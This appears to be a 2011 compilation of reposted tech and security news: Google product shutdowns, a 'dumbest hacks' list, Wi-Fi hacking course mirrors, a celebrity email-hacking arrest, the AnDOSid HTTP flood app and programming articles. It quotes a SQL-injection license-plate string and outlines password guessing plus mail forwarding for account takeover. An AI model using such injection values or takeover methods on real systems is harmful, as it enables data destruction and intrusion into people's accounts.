Information: Hackers: Heroes of the Computer Revolution - Wikipedia, the free encyclopedia
Worth reading: http://en.wikipedia.org/wiki/Hacker_Ethic
-
Google shuts down some products

10/14/2011 10:03:00 AM

We aspire to build great products that really change people's lives, products they use two or three times a day. To succeed you need real focus and thought: thought about what you work on and, just as important, what you don't work on. It's why we recently decided to shut down some products, and turn others into features of existing products. Here's the latest update on what's happening:

Code Search, which was designed to help people search for open source code all over the web, will be shut down along with the Code Search API on January 15, 2012.
In a few weeks we'll shut down Google Buzz and the Buzz API, and focus instead on Google+. While people obviously won't be able to create new posts after that, they will be able to view their existing content on their Google Profile, and download it using Google Takeout.
Jaiku, a product we acquired in 2007 that let users send updates to friends, will shut down on January 15, 2012. We'll be working to enable users to export their data from Jaiku.
Several years ago, we gave people the ability to interact socially on iGoogle. With our new focus on Google+, we will remove iGoogle's social features on January 15, 2012. iGoogle itself, and non-social iGoogle applications, will stay as they are.
The University Research Program for Google Search, which provides API access to our search results for a small number of approved academic researchers, will close on January 15, 2012.
In addition, later today the Google Labs site will shut down, and as previously announced, Boutiques.com and the former Like.com websites will be replaced by Google Product Search.

Changing the world takes focus on the future, and honesty about the past. We learned a lot from products like Buzz, and are putting that learning to work every day in our vision for products like Google+. Our users expect great things from us; today's announcements let us focus even more on giving them something truly awesome.

Posted by Bradley Horowitz, Vice President, Product

Source: http://googleblog.blogspot.com/2011/10/fall-sweep.html
-
Kindle source code

Amazon is pleased to make available to you for download an archive file of the machine readable source code ("Source Code") corresponding to modified software packages used in the Kindle device. By downloading the Source Code, you agree to the following:

AMAZON AND ITS AFFILIATES PROVIDE THE SOURCE CODE TO YOU ON AN "AS IS" BASIS WITHOUT REPRESENTATIONS OR WARRANTIES OF ANY KIND. YOU EXPRESSLY AGREE THAT YOUR USE OF THE SOURCE CODE IS AT YOUR SOLE RISK. TO THE FULL EXTENT PERMISSIBLE BY APPLICABLE LAW, AMAZON AND ITS AFFILIATES DISCLAIM ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. AMAZON AND ITS AFFILIATES WILL NOT BE LIABLE FOR ANY DAMAGES OF ANY KIND ARISING FROM THE USE OF THE SOURCE CODE, INCLUDING, BUT NOT LIMITED TO DIRECT, INDIRECT, INCIDENTAL, PUNITIVE, AND CONSEQUENTIAL DAMAGES.

Click on the links below to download an archive file of the Kindle machine readable Source Code:

Download: http://www.amazon.com/gp/help/customer/display.html?nodeId=200203720
-
Top 6 Dumbest Hacks of All Time
By David Strom / October 10, 2011

Alan Wlasuk, CEO of 403 Web Security, has compiled a list of the top six dumbest hacks of all time. While hackers can be dangerous, Alan shows that not every hacker is a brilliant mastermind. Think of the always amusing Darwin Awards pictured in our icon at left. With many of these exploits, the hacker left unintended clues in their code to make them easier to be found.

Late last year, Kelly Osbourne (of Dancing With the Stars fame, no further comment) had her email account hacked. The hacker, wanting to look not only at all of her past emails but at new ones as well, had Kelly's emails forwarded to his own, personal email account. This seemed like a pretty easy trail to follow.

Self-proclaimed hacktivist Shahee Mirza and several associates defaced a Bangladesh government military website, Rapid Action Battalion, with the following message: "GOVERNMENT DOES NOT TAKE ANY STEP FOR ICT DEVELOPMENT. BUT PASSED A LAW ABOUT ANTI-CYBER CRIME. YOU DO NOT KNOW WHAT IS THE CYBER SECURITY OR HOW TO PROTECT OWNSELF. LISTEN. HACKERS R NOT CRIMINAL. THEY R 10 TIME BETTER THAN YOUR EXPERT. WE ARE GINIOUS THAN YOU CAN'T THINK. DEFACED FROM BANGLADESH." Unfortunately, 21-year-old Mirza also left the banner that clearly stated, "HACKED BY SHAHEE_MIRZA." Obviously not the "GINIOUS" indicated in his hack, Mirza may end up with 10 years in a Bangladesh federal prison. One can only imagine what the prisons are like in one of the poorest countries in the world.

Famous for his Samy Worm, Samy Kamkar was responsible for a virus-like attack that infected over 1 million MySpace accounts in 2006. Amongst other malicious effects was the 'Samy is my hero' addition to the MySpace homepage of each of the million victims. As part of his obvious ego addition, Samy went on to boast of his hacking feat in a blog post. Unfortunately for Samy, the blog contained a picture of him with a license plate in the background, which was then used to find Samy.

20-year-old Sayaka Fukuda had her iPhone stolen on the streets of New York City. The thief, Daquan Mathis, while enjoying his new iPhone, took a picture of himself (dressed in the same clothes he wore during the mugging), which he then sent to his own email address. Unfortunately for Mathis, Fukuda's iPhone email account could be accessed on the Internet (like almost every such account). Given his email address, it was a simple matter to track Mathis down, made even simpler by the fact that the police had his picture. There are many stories about people tracking down their smartphones.

By all accounts, Eduard Lucian Mandru is a very clever hacker. His 2006 hack of the U.S. Department of Defense (DOD) computer system went undetected for years, with the authorities only having Mandru's email address (wolfenstein_ingrid@yahoo.com) as their single clue. Mandru's downfall and arrest in 2009, however, came about when he used the same wolfenstein_ingrid@yahoo.com email address on the resume that he posted on numerous job boards. Sometimes it pays to use different email addresses for different tasks, don't you think?

Alan was not sure if this hack is dumb or just really fun. One clever hacker realized that recent speed traps use cameras that automatically register your speed, take a picture of your license plate, and then use character recognition to translate your license plate number into something they can use as a lookup within the DMV database. With this in mind, he changed his license plate number to ('ZU 0666', 0, 0); Drop Database Table. If the DMV uses this string of characters in their database lookup, it has a good chance of deleting all of the database records containing his actual license plate number, ZU 0666. This has got to be 10 out of 10 on the creativity scale, and once again shows the importance of knowing what SQL injection and little Bobby Tables are all about.

Source: http://www.readwriteweb.com/hack/2011/10/top-6-dumbest-hacks-of-all-tim.php
-
WLAN Security Megaprimer Download!

We are happy to announce the general availability of the WLAN Security Megaprimer course DVD! With over 40+ HD videos containing 12+ hours of Wireless Ownage, this DVD weighs in at around 4.2 Gigabytes! A quick breakdown of the course topics and associated videos is available here. We are now offering a certification - SecurityTube Wi-Fi Security Expert (SWSE) - which uses this DVD as the courseware. Visit the Certifications page for more details!

Core Course Material Download Links:
1. Mirror thanks to Mister_X from the Aircrack Team: http://securitytube.aircrack-ng.org/Wi-Fi-Security-Megaprimer/WLAN-Security-Megaprimer-v1.iso
2. Mirror thanks to Chaos Darmstadt: http://private.chaos-darmstadt.de/~alech/securitytube/WLAN-Security-Megaprimer-v1.iso
3. Mirror thanks to KokelNet.de (both IPv4 and IPv6!): http://securitytube.kokelnet.de/DVDs/WLAN-Security-Megaprimer-v1.iso
4. Mirror thanks to the BofH of Nikhef (both IPv4 and IPv6!): http://wipkip.nikhef.nl/events/securitytube/DVD/WLAN-Security-Megaprimer-v1.iso
5. Mirror thanks to y0ug: http://mirror2.codsec.com/Wi-Fi-Security-Megaprimer/WLAN-Security-Megaprimer-v1.iso and http://mirror.codsec.com/Wi-Fi-Security-Megaprimer/WLAN-Security-Megaprimer-v1.iso
6. Mirror thanks to Bernard from Insecure.co.nz: http://www.insecure.co.nz/WLAN-Security-Megaprimer-v1.iso
7. Mirror thanks to djekl: http://securitytube.djekl.co.uk/Wi-Fi-Security-Megaprimer/WLAN-Security-Megaprimer-v1.iso

Torrents:
1. Torrent thanks to Christiaan Rakowski: http://csrakowski.dyndns.info/files/WLAN-Security-Megaprimer-v1.iso.torrent
2. Torrent thanks to Tobias Koopmann: http://tracker.kokelnet.de/torrents/WLAN-Security-Megaprimer-v1.iso.torrent

MD5 Hash: 939d8aa5eb2cd0fa63295953ecf36580

More information: http://thehackernews.com/2011/10/swse-most-advanced-wi-fi-hacking-and.html

Source: Megaprimers Download and Support
-
GateOne Beta - Terminal emulator for HTML5 web browsers
Posted by THN Reporter On 10/14/2011 05:47:00 AM

The software makes use of WebSockets to connect a server backend written in Python and a frontend written for modern browsers in JavaScript, HTML5 and CSS. The frontend doesn't require any browser plug-ins to be installed. Gate One also supports HTTP over SSL (https) secure connections from the browser to the server and authentication technologies such as Kerberos. It has its own internal plug-in system (plug-ins can be written in Python, JavaScript and CSS); currently available plug-ins for Gate One include SSH client connections, session recording and playback, and a bookmark manager for storing terminal sessions.

Top features:
* No browser plugins required!
* Supports multiple simultaneous terminal sessions. As many as your hardware can handle.
* Users can re-connect to their running terminals whenever they like from anywhere.
* Can be embedded into other applications. Add a terminal--running whatever application(s) you want--to your web app! Would be vastly superior to, say, a Java-based serial console applet (hint hint).
* Includes a powerful plugin system that supports plugins written in Python, JavaScript, and even CSS (yes, you can write a CSS-only plugin).
* The Gate One server can be stopped & started without users losing their running terminal applications (even SSH sessions stay connected!). In essence, worry-free upgrades!
* The SSH plugin allows users to duplicate sessions without having to re-enter their username and password (it re-uses the existing SSH tunnel).
* Provides users with the ability to play back and save/share their terminal sessions via a self-contained HTML playback file.
* Similarly, supports server-side logging, recording, and video-like playback of user sessions. It can even log to syslog to support whatever centralized logging system you want.
* Kerberos-based Single Sign-on support is included. It even works with Active Directory. Other authentication options are available as well.

Download: https://github.com/liftoff/GateOne/downloads

Source and demo: GateOne Beta - Terminal emulator for HTML5 web browsers ~ THN : The Hacker News
-
Hcon's Security Testing Framework (Hcon STF) v0.1beta
Posted by THN Reporter On 10/13/2011 02:16:00 PM

After the first demo of Hfox, many people asked about a Chromium-based framework for penetration testing/ethical hacking. After 3 months of work and research, and some input from AJ, the following tool has been developed for the arsenal of Hcon's tools:

Specifications
1. Based on Chromium Source (iron build) version 14.
2. Works for every need of hacking/penetration testing such as recon, enumeration, social engineering, exploitation, vulnerability assessment, anonymity, mobile tools, and reporting.
3. More secure, tracking-free from Google and more stable than other Chromium-based builds.
4. Over 100 tools integrated with an easy-to-use interface.
5. Tested and heavily modified tools with suggestions contributed by professional penetration testers, web developers and security researchers.
6. Free and open source software.
7. Totally portable (no need to install). You can carry it around in your USB storage, memory card, etc.
8. Runs on all Windows, including Windows XP, Vista, 7.

License: Many free & open source licenses
Contributors: Thanks to AJ's input to this project on UI changes.
Official project page: http://www.hcon.in/hstf.html
Main site: http://www.hcon.in/
Another project, based on Firefox: Hfox v0.3 http://www.hcon.in/hfox.html

Source: http://thehackernews.com/2011/10/hcons-security-testing-framework-hcon.html
-
Operation Hackerazzi: FBI arrests alleged hacker for stealing naked photos of Hollywood stars
Posted by THN Reporter On 10/13/2011 02:10:00 PM

FEDERAL officials on Wednesday arrested a 35-year-old Florida man, Christopher Chaney, and charged him with 26 counts of cyber-related crimes against Hollywood stars following an 11-month federal probe dubbed "Operation Hackerazzi".

Twitter was ablaze earlier today with messages claiming to link to naked pictures of film actress Scarlett Johansson, which were allegedly stolen from her iPhone by a hacker earlier this year. The photographs may or may not be of Scarlett Johansson, but I would suggest that every hot-blooded male exercises some restraint, as it's extremely possible that cybercriminals might exploit the interest to post dangerous links on the web designed to infect computers or steal information.

To gain access to these email accounts, Chaney would search through details of celebrity lives within magazines as well as social media accounts like Twitter and figure out possible passwords. Once Chaney cracked the password, he would set up email forwarding to send a duplicate version of all emails to his personal account. This allowed Chaney to continue receiving emails after the password was reset. Gaining access to one account also allowed Chaney to access the address book and discover more celebrity email addresses.

Chaney faces 26 counts of identity theft, unauthorized access to a protected computer and wiretapping. If convicted on all counts, Chaney could receive 121 years in prison for his crimes. Chaney was released on a $10,000 bond earlier today, but several restrictions are in place for the hacker. Chaney isn't allowed access to any computer or other device with Internet access, and travel is restricted to the Middle District of Florida and Central District of California for trial purposes.

Source: http://thehackernews.com/2011/10/operation-hackerazzi-fbi-arrests.html
-
NoSQL
Author: Greg Burd

Choosing between databases used to boil down to examining the differences between the available commercial and open source relational databases. The term "database" had become synonymous with SQL, and for a while not much else came close to being a viable solution for data storage. But recently there has been a shift in the database landscape. When considering options for data storage, there is a new game in town: NoSQL databases. In this article I'll introduce this new category of databases, examine where they came from and what they are good for, and help you understand whether you, too, should be considering a NoSQL solution in place of, or in addition to, your RDBMS database.

What Is NoSQL?

The only thing that all NoSQL solutions providers generally agree on is that the term "NoSQL" isn't perfect, but it is catchy. Most agree that the "no" stands for "not only"—an admission that the goal is not to reject SQL but, rather, to compensate for the technical limitations shared by the majority of relational database implementations. In fact, NoSQL is more a rejection of a particular software and hardware architecture for databases than of any single technology, language, or product. Relational databases evolved in a different era with different technological constraints, leading to a design that was optimal for the typical deployment prevalent at that time. But times have changed, and that once successful design is now a limitation. You might hear conversations suggesting that a better term for this category is NoRDBMS or half a dozen other labels, but the critical thing to remember is that NoSQL solutions started off with a different set of goals and evolved in a different environment, and so they are operationally different and, arguably, provide better-suited solutions for many of today's data storage problems.

Article: http://www.usenix.org/publications/login/2011-10/openpdfs/Burd.pdf
-
AnDOSid - DOS testing tool for Android

The rise of groups like Anonymous and LulzSec, as well as the constant India / Pakistan cyberwar, has raised the issue of cyber-security high(er) in the minds of web owners. Security tools exist to simulate such attacks and help website security people defend against them; however, for the most part they currently only exist for desktop computers. Mobile phones have, over the last few years, grown from simple devices that send and receive calls to mobile computing platforms which can be purchased for less than $100 a device.

AnDOSid fills that gap, allowing security professionals to simulate a DOS attack (an HTTP POST flood attack, to be exact) and of course a DDoS on a web server, from mobile phones. However, it also transmits both the phone's IMEI and the Android ID to prevent its use by malicious people. AnDOSid is designed for security professionals only! AnDOSid tags posts with two unique numbers which relate to the Android device that sent the request.

AnDOSid allows security professionals to simulate a DOS attack (an HTTP POST flood attack, to be exact) and of course a DDoS on a web server, from mobile phones. AnDOSid is actively being developed and feedback is welcomed from the security community as to how you would like the application to evolve. Scott Herbert developed this tool for Android and it is designed for security professionals/pentesters.

Some possible new features could include:
* A drop-down list of recent targets
* User-defined delay between posts
* An option for GET-based testing

And this tool can be downloaded from the below link, which costs just 1L.
https://market.android.com/details?id=com.scott.herbert.AnDOSid

Source: http://www.computingtweaks.com/2011/10/andosid-dos-testing-tool-for-android.html
-
From C to C++: A quick reference for aging programmers

So you were a great system programmer, back in the old days; your low level programs were celebrated by clever people, you loved C pointers and some days even considered Assembler as an option. You were happy and self-confident. But somehow you screwed something up, got trapped in a time vortex and you ended up today trying to maintain or develop a program using that pesky Object Oriented Programming model in something called C++. I understand you; follow this guide and learn a bunch of things that will put you out of your misery and help you understand this brave new world.

Contents:
* Structs
* Classes
* Encapsulation
* Constructors and destructors
* This
* Inheritance
* Virtual methods
* Overloading
* Function and method overloading
* Operator overloading
* References
* Exceptions
* Templates
* Other features
* Default values for function arguments
* New and delete
* See also

Article: http://triptico.com/docs/c2cpp.html
-
I don't have the access needed to set up a chat, and I don't run into kwe much anymore either. We work, we get home late, and after 8 hours at work in front of the computer you don't feel like sitting another 2-3 hours at home, especially since at work you at least earn some money. I'll talk to kwe when I get hold of him.